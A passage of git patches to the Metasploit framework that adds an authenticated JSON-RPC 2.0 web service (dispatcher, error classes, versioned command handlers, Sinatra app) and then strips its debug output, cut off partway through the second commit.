"msf/core/rpc/service" -require "msf/core/rpc/client" +module Msf::RPC + require 'msf/core/rpc/v10/constants' -require "msf/core/rpc/base" -require "msf/core/rpc/auth" -require "msf/core/rpc/core" -require "msf/core/rpc/session" -require "msf/core/rpc/module" -require "msf/core/rpc/job" -require "msf/core/rpc/console" -require "msf/core/rpc/db" -require "msf/core/rpc/plugin" + require 'msf/core/rpc/v10/service' + require 'msf/core/rpc/v10/client' + require 'msf/core/rpc/v10/rpc_auth' + require 'msf/core/rpc/v10/rpc_base' + require 'msf/core/rpc/v10/rpc_console' + require 'msf/core/rpc/v10/rpc_core' + require 'msf/core/rpc/v10/rpc_db' + require 'msf/core/rpc/v10/rpc_job' + require 'msf/core/rpc/v10/rpc_module' + require 'msf/core/rpc/v10/rpc_plugin' + require 'msf/core/rpc/v10/rpc_session' + + + module JSON + autoload :Dispatcher, 'msf/core/rpc/json/dispatcher' + autoload :DispatcherHelper, 'msf/core/rpc/json/dispatcher_helper' + autoload :RpcCommand, 'msf/core/rpc/json/rpc_command' + autoload :RpcCommandFactory, 'msf/core/rpc/json/rpc_command_factory' + + # exception classes + autoload :Error, 'msf/core/rpc/json/error' + autoload :ParseError, 'msf/core/rpc/json/error' + autoload :InvalidRequest, 'msf/core/rpc/json/error' + autoload :MethodNotFound, 'msf/core/rpc/json/error' + autoload :InvalidParams, 'msf/core/rpc/json/error' + autoload :InternalError, 'msf/core/rpc/json/error' + autoload :ServerError, 'msf/core/rpc/json/error' + autoload :ApplicationServerError, 'msf/core/rpc/json/error' + end +end diff --git a/lib/msf/core/rpc/json/dispatcher.rb b/lib/msf/core/rpc/json/dispatcher.rb new file mode 100644 index 0000000000..eaebadf587 --- /dev/null +++ b/lib/msf/core/rpc/json/dispatcher.rb @@ -0,0 +1,206 @@ +require 'json' +require 'msf/core/rpc' + +module Msf::RPC::JSON + class Dispatcher + JSON_RPC_VERSION = '2.0' + + attr_reader :framework + attr_reader :command + + def initialize(framework) + @framework = framework + @command = nil + end + + def set_command(command) + @command = command + $stderr.puts("Msf::RPC::JSON::Dispatcher.set_command(): command=#{command}, @command=#{@command}") # TODO: remove + end + + def process(source) + begin + $stderr.puts("Msf::RPC::JSON::Dispatcher.process(): source=#{source}") # TODO: remove + request = parse_json_request(source) + $stderr.puts("Msf::RPC::JSON::Dispatcher.process(): request=#{request}") # TODO: remove + if request.is_a?(Array) + $stderr.puts("Msf::RPC::JSON::Dispatcher.process(): batch request") # TODO: remove + # If the batch rpc call itself fails to be recognized as an valid + # JSON or as an Array with at least one value, the response from + # the Server MUST be a single Response object. + raise InvalidRequest.new if request.empty? + # process batch request + response = request.map { |r| process_request(r) } + # A Response object SHOULD exist for each Request object, except that + # there SHOULD NOT be any Response objects for notifications. + # Remove nil responses from response array + response.compact! + else + response = process_request(request) + end + rescue ParseError, InvalidRequest => e + # If there was an error in detecting the id in the Request object + # (e.g. Parse error/Invalid Request), then the id member MUST be + # Null. Don't pass request obj when building the error response. + response = self.class.create_error_response(e) + rescue RpcError => e + # other JSON-RPC errors should include the id from the Request object + response = self.class.create_error_response(e, request) + rescue => e + response = self.class.create_error_response(ApplicationServerError.new(e), request) + end + + # When a rpc call is made, the Server MUST reply with a Response, except + # for in the case of Notifications. The Response is expressed as a single + # JSON Object. + self.class.to_json(response) + end + + def process_request(request) + begin + $stderr.puts("Msf::RPC::JSON::Dispatcher.process_request(): request=#{request}") # TODO: remove + + if !validate_rpc_request(request) + response = self.class.create_error_response(InvalidRequest.new) + return response + end + + # dispatch method execution to command + result = @command.execute(request[:method], request[:params]) + $stderr.puts("Msf::RPC::JSON::Dispatcher.process_request(): dispatch result=#{result}, result.class=#{result.class}") # TODO: remove + + # A Notification is a Request object without an "id" member. A Request + # object that is a Notification signifies the Client's lack of interest + # in the corresponding Response object, and as such no Response object + # needs to be returned to the client. The Server MUST NOT reply to a + # Notification, including those that are within a batch request. + if request.key?(:id) + response = self.class.create_success_response(result, request) + else + response = nil + end + + response + rescue ArgumentError + raise InvalidParams.new + rescue Msf::RPC::Exception => e + ApplicationServerError.new(e.message, data: { code: e.code }) + # rescue => e + # raise ApplicationServerError.new(e) + end + end + + def validate_rpc_request(request) + required_members = %i(jsonrpc method) + member_types = { + # A String specifying the version of the JSON-RPC protocol. + jsonrpc: [String], + # A String containing the name of the method to be invoked. + method: [String], + # If present, parameters for the rpc call MUST be provided as a Structured + # value. Either by-position through an Array or by-name through an Object. + # * by-position: params MUST be an Array, containing the values in the + # Server expected order. + # * by-name: params MUST be an Object, with member names that match the + # Server expected parameter names. The absence of expected names MAY + # result in an error being generated. The names MUST match exactly, + # including case, to the method's expected parameters. + params: [Array, Hash], + # An identifier established by the Client that MUST contain a String, + # Number, or NULL value if included. If it is not included it is assumed + # to be a notification. The value SHOULD normally not be Null [1] and + # Numbers SHOULD NOT contain fractional parts [2] + id: [Integer, String, NilClass] + } + + $stderr.puts("Msf::RPC::JSON::Dispatcher.validate_rpc_request(): request.is_a?(Hash)=#{request.is_a?(Hash)}, request=#{request}") + # validate request is an object + return false unless request.is_a?(Hash) + + # validate request contains required members + required_members.each { |member| return false unless request.key?(member) } + # required_members.each do |member| + # $stderr.puts("Msf::RPC::JSON::Dispatcher.validate_rpc_request(): member=#{member}, request.key?(member)=#{request.key?(member)}") + # return false unless request.key?(member) + # end + + $stderr.puts("Msf::RPC::JSON::Dispatcher.validate_rpc_request(): request[:jsonrpc] != JSON_RPC_VERSION=#{request[:jsonrpc] != JSON_RPC_VERSION}") + return false if request[:jsonrpc] != JSON_RPC_VERSION + + # validate request members are correct types + request.each do |member, value| + return false if member_types.key?(member) && + !member_types[member].one? { |type| value.is_a?(type) } + # if member_types.key?(member) && !member_types[member].one? { |type| value.is_a?(type) } + # return false + # else + # return false + # end + end + + true + end + + # Parse the JSON document source into a Hash or Array with symbols for the names (keys). + # @return [Hash or Array] source + def parse_json_request(source) + begin + JSON.parse(source, symbolize_names: true) + rescue + raise ParseError.new + end + end + + # Serialize data as JSON string. + # @return [String] data serialized JSON string if data not nil; otherwise, nil. + def self.to_json(data) + return nil if data.nil? + + json = data.to_json + return json.to_s + end + + def self.create_success_response(result, request = nil) + response = { + # A String specifying the version of the JSON-RPC protocol. + jsonrpc: JSON_RPC_VERSION, + + # This member is REQUIRED on success. + # This member MUST NOT exist if there was an error invoking the method. + # The value of this member is determined by the method invoked on the Server. + result: result + } + + self.add_response_id_member(response, request) + $stderr.puts("Msf::RPC::JSON::Dispatcher.success_response(): response=#{response}") + + response + end + + def self.create_error_response(error, request = nil) + response = { + # A String specifying the version of the JSON-RPC protocol. + jsonrpc: JSON_RPC_VERSION, + + # This member is REQUIRED on error. + # This member MUST NOT exist if there was no error triggered during invocation. + # The value for this member MUST be an Object as defined in section 5.1. + error: error.to_h + } + + self.add_response_id_member(response, request) + $stderr.puts("Msf::RPC::JSON::Dispatcher.error_response(): response=#{response}") + + response + end + + # Adds response id based on request id. + def self.add_response_id_member(response, request) + if !request.nil? && request.key?(:id) + response[:id] = request[:id] + else + response[:id] = nil + end + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/dispatcher_helper.rb b/lib/msf/core/rpc/json/dispatcher_helper.rb new file mode 100644 index 0000000000..64544f449b --- /dev/null +++ b/lib/msf/core/rpc/json/dispatcher_helper.rb @@ -0,0 +1,28 @@ +require 'msf/core/rpc' + +module Msf::RPC::JSON + module DispatcherHelper + def get_dispatcher(dispatchers, version, framework) + $stderr.puts("Msf::RPC::JSON::DispatcherHelper.get_dispatcher(): dispatchers=#{dispatchers}, version=#{version}, framework=#{framework}") + version_sym = version.to_sym + unless dispatchers.key?(version_sym) + $stderr.puts("Msf::RPC::JSON::DispatcherHelper.get_dispatcher(): creating dispatcher for RPC version #{version}...") + dispatchers[version_sym] = create_dispatcher(version_sym, framework) + end + + dispatchers[version_sym] + end + + def create_dispatcher(version, framework) + $stderr.puts("Msf::RPC::JSON::DispatcherHelper.create_dispatcher(): version=#{version}, framework=#{framework}") + $stderr.puts("Msf::RPC::JSON::DispatcherHelper.create_dispatcher(): creating RpcCommand...") + command = RpcCommandFactory.create(version, framework) + $stderr.puts("Msf::RPC::JSON::DispatcherHelper.create_dispatcher(): command=#{command}") + $stderr.puts("Msf::RPC::JSON::DispatcherHelper.create_dispatcher(): creating Dispatcher...") + dispatcher = Dispatcher.new(framework) + dispatcher.set_command(command) + + dispatcher + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/error.rb b/lib/msf/core/rpc/json/error.rb new file mode 100644 index 0000000000..f1db564324 --- /dev/null +++ b/lib/msf/core/rpc/json/error.rb @@ -0,0 +1,136 @@ +module Msf::RPC::JSON + + # JSON-RPC 2.0 Error Codes + ## Specification errors: + PARSE_ERROR = -32700 + INVALID_REQUEST = -32600 + METHOD_NOT_FOUND = -32601 + INVALID_PARAMS = -32602 + INTERNAL_ERROR = -32603 + ## Implementation-defined server-errors: + SERVER_ERROR_MAX = -32000 + SERVER_ERROR_MIN = -32099 + APPLICATION_SERVER_ERROR = -32000 + + # JSON-RPC 2.0 Error Messages + ERROR_MESSAGES = { + # Specification errors: + PARSE_ERROR => 'Invalid JSON was received by the server. An error occurred on the server while parsing the JSON text.', + INVALID_REQUEST => 'The JSON sent is not a valid Request object.', + METHOD_NOT_FOUND => 'The method %s does not exist.', + INVALID_PARAMS => 'Invalid method parameter(s).', + INTERNAL_ERROR => 'Internal JSON-RPC error', + # Implementation-defined server-errors: + APPLICATION_SERVER_ERROR => 'Application server error: %s', + } + + # Base class for all Msf::RPC::JSON exceptions. + class RpcError < StandardError + # Code Message Meaning + # -32700 Parse error Invalid JSON was received by the server. An error + # occurred on the server while parsing the JSON text. + # -32600 Invalid Request The JSON sent is not a valid Request object. + # -32601 Method not found The method does not exist / is not available. + # -32602 Invalid params Invalid method parameter(s). + # -32603 Internal error Internal JSON-RPC error. + # -32000 to -32099 Server error Reserved for implementation-defined server-errors. + + attr_reader :code + attr_reader :message + attr_reader :data + + # Instantiate an RpcError object. + # + # @param code [Integer] A Number that indicates the error type that occurred. + # @param message [String] A String providing a short description of the error. + # The message SHOULD be limited to a concise single sentence. + # @param data [Object] A Primitive or Structured value that contains additional + # information about the error. This may be omitted. The value of this member is + # defined by the Server (e.g. detailed error information, nested errors etc.). + # The default value is nil. + def initialize(code, message, data: nil) + super(message) + @code = code + @message = message + @data = data + end + + def to_h + hash = { + code: @code, + message: @message + } + + # process data member + unless @data.nil? + if @data.is_a?(String) || @data.kind_of?(Numeric) || @data.is_a?(Array) || @data.is_a?(Hash) + hash[:data] = @data + elsif @data.respond_to?(:to_h) + hash[:data] = @data.to_h + else + hash[:data] = @data.to_s + end + end + + hash + end + end + + class ParseError < RpcError + def initialize(data: nil) + super(PARSE_ERROR, ERROR_MESSAGES[PARSE_ERROR], data: data) + end + end + + class InvalidRequest < RpcError + def initialize(data: nil) + super(INVALID_REQUEST, ERROR_MESSAGES[INVALID_REQUEST], data: data) + end + end + + class MethodNotFound < RpcError + def initialize(method, data: nil) + super(METHOD_NOT_FOUND, ERROR_MESSAGES[METHOD_NOT_FOUND] % {name: method}, data: data) + end + end + + class InvalidParams < RpcError + def initialize(data: nil) + super(INVALID_PARAMS, ERROR_MESSAGES[INVALID_PARAMS], data: data) + end + end + + class InternalError < RpcError + def initialize(e, data: nil) + super(INTERNAL_ERROR, "#{ERROR_MESSAGES[INTERNAL_ERROR]}: #{e}", data: data) + end + end + + # Class is reserved for implementation-defined server-error exceptions. + class ServerError < RpcError + + # Instantiate a ServerError object. + # + # @param code [Integer] A Number that indicates the error type that occurred. + # The code must be between -32000 and -32099. + # @param message [String] A String providing a short description of the error. + # The message SHOULD be limited to a concise single sentence. + # @param data [Object] A Primitive or Structured value that contains additional + # information about the error. This may be omitted. The value of this member is + # defined by the Server (e.g. detailed error information, nested errors etc.). + # The default value is nil. + # @raise [ArgumentError] Module not found (either the wrong type or name). + def initialize(code, message, data: nil) + if code < SERVER_ERROR_MIN || code > SERVER_ERROR_MAX + raise ArgumentError.new("invalid code #{code}, must be between #{SERVER_ERROR_MAX} and #{SERVER_ERROR_MIN}") + end + super(code, message, data: data) + end + end + + class ApplicationServerError < ServerError + def initialize(message, data: nil) + super(APPLICATION_SERVER_ERROR, ERROR_MESSAGES[APPLICATION_SERVER_ERROR] % {msg: message}, data: data) + end + end +end diff --git a/lib/msf/core/rpc/json/rpc_command.rb b/lib/msf/core/rpc/json/rpc_command.rb new file mode 100644 index 0000000000..10df34c4c7 --- /dev/null +++ b/lib/msf/core/rpc/json/rpc_command.rb @@ -0,0 +1,80 @@ +module Msf::RPC::JSON + class RpcCommand + attr_reader :framework + attr_accessor :execute_timeout + + def initialize(framework, execute_timeout: 7200) + @framework = framework + @execute_timeout = execute_timeout + @methods = {} + + $stderr.puts("Msf::RPC::JSON::RpcCommand.initialize(): @framework=#{@framework}, @framework.object_id=#{@framework.object_id}") + $stderr.puts("Msf::RPC::JSON::RpcCommand.initialize(): @execute_timeout=#{@execute_timeout}") + $stderr.puts("Msf::RPC::JSON::RpcCommand.initialize(): @methods=#{@methods}") + end + + # Add a method to the RPC Command + def register_method(method, name: nil) + $stderr.puts("Msf::RPC::JSON::RpcCommand.register_method(): method.class=#{method.class}, method.inspect=#{method.inspect}, name=#{name}") + if name.nil? + if method.is_a?(Method) + $stderr.puts("Msf::RPC::JSON::RpcCommand.register_method(): method.name=#{method.name}") + name = method.name.to_s + else + name = method.to_s + end + end + @methods[name] = method + end + + # Call method on the receiver object previously registered. + def execute(method, params) + $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): method=#{method}, params=#{params}") + $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): @methods.key?(method)=#{@methods.key?(method)}") + $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): @methods[method]=#{@methods[method]}") if @methods.key?(method) + + unless @methods.key?(method) + $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): raising MethodNotFound...") + raise MethodNotFound.new(method) + end + + $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): calling method_name=#{method}...") + ::Timeout.timeout(@execute_timeout) do + params = prepare_params(params) + if params.nil? + return @methods[method].call() + elsif params.is_a?(Array) + return @methods[method].call(*params) + else + return @methods[method].call(params) + end + end + end + + private + + # Prepare params for use by RPC methods by converting all hashes to use strings for their names (keys). + def prepare_params(params) + clean_params = params + if params.is_a?(Array) + clean_params = params.map do |p| + if p.is_a?(Hash) + stringify_names(p) + else + p + end + end + elsif params.is_a?(Hash) + clean_params = stringify_names(params) + end + + $stderr.puts("Msf::RPC::JSON::RpcCommand.prepare_params(): params=#{params}, clean_params=#{clean_params}") + clean_params + end + + # Returns a new hash with strings for the names (keys). + def stringify_names(hash) + JSON.parse(JSON.dump(hash), symbolize_names: false) + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/rpc_command_factory.rb b/lib/msf/core/rpc/json/rpc_command_factory.rb new file mode 100644 index 0000000000..6ac2c0b4e2 --- /dev/null +++ b/lib/msf/core/rpc/json/rpc_command_factory.rb @@ -0,0 +1,37 @@ +require 'msf/core/rpc' +require 'msf/core/rpc/json/v1_0/rpc_command' +require 'msf/core/rpc/json/v2_0/rpc_test' + +module Msf::RPC::JSON + class RpcCommandFactory + def self.create(version, framework) + $stderr.puts("Msf::RPC::JSON::RpcCommandFactory.create: version=#{version}, framework=#{framework}") # TODO: remove + case version + when :v1, :v1_0, :v10 + return Msf::RPC::JSON::V1_0::RpcCommand.new(framework) + when :v2, :v2_0 + return RpcCommandFactory.create_rpc_command_v2_0(framework) + else + raise ArgumentError.new("invalid RPC version #{version}") + end + end + + def self.create_rpc_command_v2_0(framework) + # TODO: does belong in some sort of loader class for an RPC version? + # instantiate receiver + rpc_test = Msf::RPC::JSON::V2_0::RpcTest.new() + $stderr.puts("Msf::RPC::JSON::RpcCommandFactory.create_rpc_command_v2_0: rpc_test=#{rpc_test}") + + command = Msf::RPC::JSON::RpcCommand.new(framework) + + # Add class methods + command.register_method(Msf::RPC::JSON::V2_0::RpcTest.method(:add)) + command.register_method(Msf::RPC::JSON::V2_0::RpcTest.method(:add), name: 'add_alias') + # Add instance methods + command.register_method(rpc_test.method(:get_instance_rand_num)) + command.register_method(rpc_test.method(:add_instance_rand_num)) + + command + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/v1_0/rpc_command.rb b/lib/msf/core/rpc/json/v1_0/rpc_command.rb new file mode 100644 index 0000000000..dd37929665 --- /dev/null +++ b/lib/msf/core/rpc/json/v1_0/rpc_command.rb @@ -0,0 +1,117 @@ +require 'base64' +require 'msf/core/rpc' + +module Msf::RPC::JSON + module V1_0 + class RpcCommand < ::Msf::RPC::JSON::RpcCommand + METHOD_GROUP_SEPARATOR = '.' + + MODULE_EXECUTE_KEY = 'module.execute' + PAYLOAD_MODULE_TYPE_KEY = 'payload' + PAYLOAD_KEY = 'payload' + + def initialize(framework, execute_timeout: 7200) + super(framework, execute_timeout: execute_timeout) + + # The legacy Msf::RPC::Service will not be started, however, it will be used to proxy + # requests to existing handlers. This frees the command from having to act as the + # service to RPC_Base subclasses and expose accessors for tokens and users. + @legacy_rpc_service = ::Msf::RPC::Service.new(@framework, { + execute_timeout: @execute_timeout + }) + + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.initialize(): @framework=#{@framework}, @framework.object_id=#{@framework.object_id}") + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.initialize(): @legacy_rpc_service=#{@legacy_rpc_service}, @legacy_rpc_service.handlers=#{@legacy_rpc_service.handlers}") + end + + def register_method(method, name: nil) + raise "#{self.class.name}##{__method__} is not implemented" + end + + # Call method on the receiver object previously registered. + def execute(method, params) + result = execute_internal(method, params) + + # post process result + result = post_process_result(result, method, params) + + result + end + + private + + # Call method on the receiver object previously registered. + def execute_internal(method, params) + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): method=#{method}, params=#{params}") + + # parse method string + group, base_method = parse_method_group(method) + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): group=#{group}, base_method=#{base_method}") # TODO: remove + + method_name = "rpc_#{base_method}" + method_name_noauth = "rpc_#{base_method}_noauth" + + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): method_name=#{base_method}, method_name_noauth=#{method_name_noauth}, @legacy_rpc_service.handlers[group]=#{@legacy_rpc_service.handlers[group]}") + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): @legacy_rpc_service.handlers[group].nil?=#{@legacy_rpc_service.handlers[group].nil?}") + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): @legacy_rpc_service.handlers[group].respond_to?(method_name)=#{@legacy_rpc_service.handlers[group].respond_to?(method_name)}") + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): @legacy_rpc_service.handlers[group].respond_to?(method_name_noauth)=#{@legacy_rpc_service.handlers[group].respond_to?(method_name_noauth)}") + + + handler = (find_handler(@legacy_rpc_service.handlers, group, method_name) || find_handler(@legacy_rpc_service.handlers, group, method_name_noauth)) + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): handler=#{handler}") + if handler.nil? + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): raising MethodNotFound...") + raise MethodNotFound.new(method) + end + + if handler.respond_to?(method_name_noauth) + method_name = method_name_noauth + end + + + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): calling method_name=#{method_name}...") + ::Timeout.timeout(@execute_timeout) do + params = prepare_params(params) + if params.nil? + return handler.send(method_name) + elsif params.is_a?(Array) + return handler.send(method_name, *params) + else + return handler.send(method_name, params) + end + end + end + + def parse_method_group(method) + idx = method.rindex(METHOD_GROUP_SEPARATOR) + if idx.nil? + group = nil + base_method = method + else + group = method[0..idx - 1] + base_method = method[idx + 1..-1] + end + return group, base_method + end + + def find_handler(handlers, group, method_name) + handler = nil + if !handlers[group].nil? && handlers[group].respond_to?(method_name) + handler = handlers[group] + end + + handler + end + + def post_process_result(result, method, params) + if method == MODULE_EXECUTE_KEY && params.size >= 2 && + params[0] == PAYLOAD_MODULE_TYPE_KEY && result.key?(PAYLOAD_KEY) + result[PAYLOAD_KEY] = Base64.strict_encode64(result[PAYLOAD_KEY]) + $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.post_process_result(): converted result key '#{PAYLOAD_KEY}': new value=#{result[PAYLOAD_KEY]}") + end + + result + end + end + end +end \ No newline at end of file diff --git a/lib/msf/core/rpc/json/v2_0/rpc_test.rb b/lib/msf/core/rpc/json/v2_0/rpc_test.rb new file mode 100644 index 0000000000..615262b793 --- /dev/null +++ b/lib/msf/core/rpc/json/v2_0/rpc_test.rb @@ -0,0 +1,30 @@ +module Msf::RPC::JSON::V2_0 + class RpcTest + + def initialize + r = Random.new + @rand_num = r.rand(0..100) + $stderr.puts("Msf::RPC::JSON::V2_0::RpcTest.initialize(): @rand_num=#{@rand_num}") + end + + def self.add(x, y) + result = x + y + $stderr.puts("Msf::RPC::JSON::V2_0::RpcTest.add(): x=#{x}, y=#{y}, result=#{result}") + + result + end + + def get_instance_rand_num + $stderr.puts("Msf::RPC::JSON::V2_0::RpcTest instance.get_instance_rand_num(): @rand_num=#{@rand_num}") + + @rand_num + end + + def add_instance_rand_num(x) + @rand_num = @rand_num + x + $stderr.puts("Msf::RPC::JSON::V2_0::RpcTest instance.add_instance_rand_num(): x=#{x}, @rand_num=#{@rand_num}") + + @rand_num + end + end +end \ No newline at end of file diff --git a/lib/msf/core/web_services/json_rpc_app.rb b/lib/msf/core/web_services/json_rpc_app.rb new file mode 100644 index 0000000000..2501b4a05b --- /dev/null +++ b/lib/msf/core/web_services/json_rpc_app.rb @@ -0,0 +1,69 @@ +require 'sinatra/base' +require 'swagger/blocks' +require 'sysrandom/securerandom' +require 'warden' +require 'msf/core/rpc' +require 'msf/core/db_manager/http/authentication' +require 'msf/core/db_manager/http/servlet_helper' +require 'msf/core/db_manager/http/servlet/auth_servlet' +require 'msf/core/db_manager/http/servlet/user_servlet' +require 'msf/core/web_services/servlet/json_rpc_servlet' + +class JsonRpcApp < Sinatra::Base + helpers ServletHelper + helpers Msf::RPC::JSON::DispatcherHelper + + # Servlet registration + register AuthServlet + register UserServlet + register JsonRpcServlet + + set :framework, Msf::Simple::Framework.create({}) + set :dispatchers, {} + + configure do + set :sessions, {key: 'msf-ws.session', expire_after: 300} + set :session_secret, ENV.fetch('MSF_WS_SESSION_SECRET') { SecureRandom.hex(16) } + end + + before do + # store DBManager in request environment so that it is available to Warden + request.env['msf.db_manager'] = get_db + # store flag indicating whether authentication is initialized in the request environment + @@auth_initialized ||= get_db.users({}).count > 0 + request.env['msf.auth_initialized'] = @@auth_initialized + end + + use Warden::Manager do |config| + # failed authentication is handled by this application + config.failure_app = self + # don't intercept 401 responses since the app will provide custom failure messages + config.intercept_401 = false + config.default_scope = :api + + config.scope_defaults :user, + # whether to persist the result in the session or not + store: true, + # list of strategies to use + strategies: [:password], + # action (route) of the failure application + action: "#{AuthServlet.api_unauthenticated_path}/user" + + config.scope_defaults :api, + # whether to persist the result in the session or not + store: false, + # list of strategies to use + strategies: [:api_token], + # action (route) of the failure application + action: AuthServlet.api_unauthenticated_path + + config.scope_defaults :admin_api, + # whether to persist the result in the session or not + store: false, + # list of strategies to use + strategies: [:admin_api_token], + # action (route) of the failure application + action: AuthServlet.api_unauthenticated_path + end + +end \ No newline at end of file diff --git a/lib/msf/core/web_services/servlet/json_rpc_servlet.rb b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb new file mode 100644 index 0000000000..dcbce72157 --- /dev/null +++ b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb @@ -0,0 +1,36 @@ +require 'msf/core/rpc' + +module JsonRpcServlet + + def self.api_path + '/api/:version/json-rpc' + end + + def self.registered(app) + app.post JsonRpcServlet.api_path, &post_rpc + end + + ####### + private + ####### + + def self.post_rpc + lambda { + warden.authenticate! + begin + body = request.body.read + $stderr.puts("JsonRpcServlet: body=#{body}") + tmp_params = sanitize_params(params) + $stderr.puts("JsonRpcServlet: tmp_params=#{tmp_params}") + + data = get_dispatcher(settings.dispatchers, tmp_params[:version], settings.framework).process(body) + set_raw_response(data) + rescue => e + print_error("There was an error executing the RPC: #{e.message}.", e) + error = Msf::RPC::JSON::Dispatcher.create_error_response(Msf::RPC::JSON::InternalError.new(e)) + data = Msf::RPC::JSON::Dispatcher.to_json(error) + set_raw_response(data, code: 500) + end + } + end +end \ No newline at end of file diff --git a/msf-json-rpc.ru b/msf-json-rpc.ru new file mode 100644 index 0000000000..1bd93c2205 --- /dev/null +++ b/msf-json-rpc.ru @@ -0,0 +1,21 @@ +# msf-json-rpc.ru +# Start using thin: +# thin --rackup msf-json-rpc.ru --address localhost --port 8081 --environment development --tag msf-json-rpc start +# + +require 'pathname' +@framework_path = '.' +root = Pathname.new(@framework_path).expand_path +@framework_lib_path = root.join('lib') +$LOAD_PATH << @framework_lib_path unless $LOAD_PATH.include?(@framework_lib_path) + +require 'msfenv' + +if ENV['MSF_LOCAL_LIB'] + $LOAD_PATH << ENV['MSF_LOCAL_LIB'] unless $LOAD_PATH.include?(ENV['MSF_LOCAL_LIB']) +end + +# Note: setup Rails environment before calling require +require 'msf/core/web_services/json_rpc_app' + +run JsonRpcApp From 4acf695de99948feb5b937896d10779fd41bb7b5 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Thu, 20 Sep 2018 18:05:36 -0400 Subject: [PATCH 037/192] Remove debug output and unused code --- lib/msf/core/rpc/json/dispatcher.rb | 22 ------------------- lib/msf/core/rpc/json/dispatcher_helper.rb | 6 ----- lib/msf/core/rpc/json/rpc_command.rb | 13 ----------- lib/msf/core/rpc/json/rpc_command_factory.rb | 2 -- lib/msf/core/rpc/json/v1_0/rpc_command.rb | 17 -------------- lib/msf/core/rpc/json/v2_0/rpc_test.rb | 9 +------- .../web_services/servlet/json_rpc_servlet.rb | 3 --- 7 files changed, 1 insertion(+), 71 deletions(-) diff --git a/lib/msf/core/rpc/json/dispatcher.rb b/lib/msf/core/rpc/json/dispatcher.rb index eaebadf587..a1b5a83b53 100644 --- a/lib/msf/core/rpc/json/dispatcher.rb +++ b/lib/msf/core/rpc/json/dispatcher.rb @@ -15,16 +15,12 @@ module Msf::RPC::JSON def set_command(command) @command = command - $stderr.puts("Msf::RPC::JSON::Dispatcher.set_command(): command=#{command}, @command=#{@command}") # TODO: remove end def process(source) begin - $stderr.puts("Msf::RPC::JSON::Dispatcher.process(): source=#{source}") # TODO: remove request = parse_json_request(source) - $stderr.puts("Msf::RPC::JSON::Dispatcher.process(): request=#{request}") # TODO: remove if request.is_a?(Array) - $stderr.puts("Msf::RPC::JSON::Dispatcher.process(): batch request") # TODO: remove # If the batch rpc call itself fails to be recognized as an valid # JSON or as an Array with at least one value, the response from # the Server MUST be a single Response object. @@ -58,8 +54,6 @@ module Msf::RPC::JSON def process_request(request) begin - $stderr.puts("Msf::RPC::JSON::Dispatcher.process_request(): request=#{request}") # TODO: remove - if !validate_rpc_request(request) response = self.class.create_error_response(InvalidRequest.new) return response @@ -67,7 +61,6 @@ module Msf::RPC::JSON # dispatch method execution to command result = @command.execute(request[:method], request[:params]) - $stderr.puts("Msf::RPC::JSON::Dispatcher.process_request(): dispatch result=#{result}, result.class=#{result.class}") # TODO: remove # A Notification is a Request object without an "id" member. A Request # object that is a Notification signifies the Client's lack of interest @@ -85,8 +78,6 @@ module Msf::RPC::JSON raise InvalidParams.new rescue Msf::RPC::Exception => e ApplicationServerError.new(e.message, data: { code: e.code }) - # rescue => e - # raise ApplicationServerError.new(e) end end @@ -113,29 +104,18 @@ module Msf::RPC::JSON id: [Integer, String, NilClass] } - $stderr.puts("Msf::RPC::JSON::Dispatcher.validate_rpc_request(): request.is_a?(Hash)=#{request.is_a?(Hash)}, request=#{request}") # validate request is an object return false unless request.is_a?(Hash) # validate request contains required members required_members.each { |member| return false unless request.key?(member) } - # required_members.each do |member| - # $stderr.puts("Msf::RPC::JSON::Dispatcher.validate_rpc_request(): member=#{member}, request.key?(member)=#{request.key?(member)}") - # return false unless request.key?(member) - # end - $stderr.puts("Msf::RPC::JSON::Dispatcher.validate_rpc_request(): request[:jsonrpc] != JSON_RPC_VERSION=#{request[:jsonrpc] != JSON_RPC_VERSION}") return false if request[:jsonrpc] != JSON_RPC_VERSION # validate request members are correct types request.each do |member, value| return false if member_types.key?(member) && !member_types[member].one? { |type| value.is_a?(type) } - # if member_types.key?(member) && !member_types[member].one? { |type| value.is_a?(type) } - # return false - # else - # return false - # end end true @@ -172,7 +152,6 @@ module Msf::RPC::JSON } self.add_response_id_member(response, request) - $stderr.puts("Msf::RPC::JSON::Dispatcher.success_response(): response=#{response}") response end @@ -189,7 +168,6 @@ module Msf::RPC::JSON } self.add_response_id_member(response, request) - $stderr.puts("Msf::RPC::JSON::Dispatcher.error_response(): response=#{response}") response end diff --git a/lib/msf/core/rpc/json/dispatcher_helper.rb b/lib/msf/core/rpc/json/dispatcher_helper.rb index 64544f449b..a4e08f563a 100644 --- a/lib/msf/core/rpc/json/dispatcher_helper.rb +++ b/lib/msf/core/rpc/json/dispatcher_helper.rb @@ -3,10 +3,8 @@ require 'msf/core/rpc' module Msf::RPC::JSON module DispatcherHelper def get_dispatcher(dispatchers, version, framework) - $stderr.puts("Msf::RPC::JSON::DispatcherHelper.get_dispatcher(): dispatchers=#{dispatchers}, version=#{version}, framework=#{framework}") version_sym = version.to_sym unless dispatchers.key?(version_sym) - $stderr.puts("Msf::RPC::JSON::DispatcherHelper.get_dispatcher(): creating dispatcher for RPC version #{version}...") 